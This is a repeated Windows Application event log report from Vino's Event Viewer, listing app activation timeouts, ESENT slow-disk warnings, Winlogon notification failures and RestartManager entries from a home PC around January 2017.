Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.

Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.

Context:  Application, SystemIndex Catalog

Details:
    The system cannot find the file specified.  (HRESULT : 0x80070002) (0x80070002)


Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.

Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.

Context:  Application, SystemIndex Catalog

Details:
    The system cannot find the file specified.  (HRESULT : 0x80070002) (0x80070002)


Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.

Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.

Context:  Application, SystemIndex Catalog

Details:
    The system cannot find the file specified.  (HRESULT : 0x80070002) (0x80070002)


Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

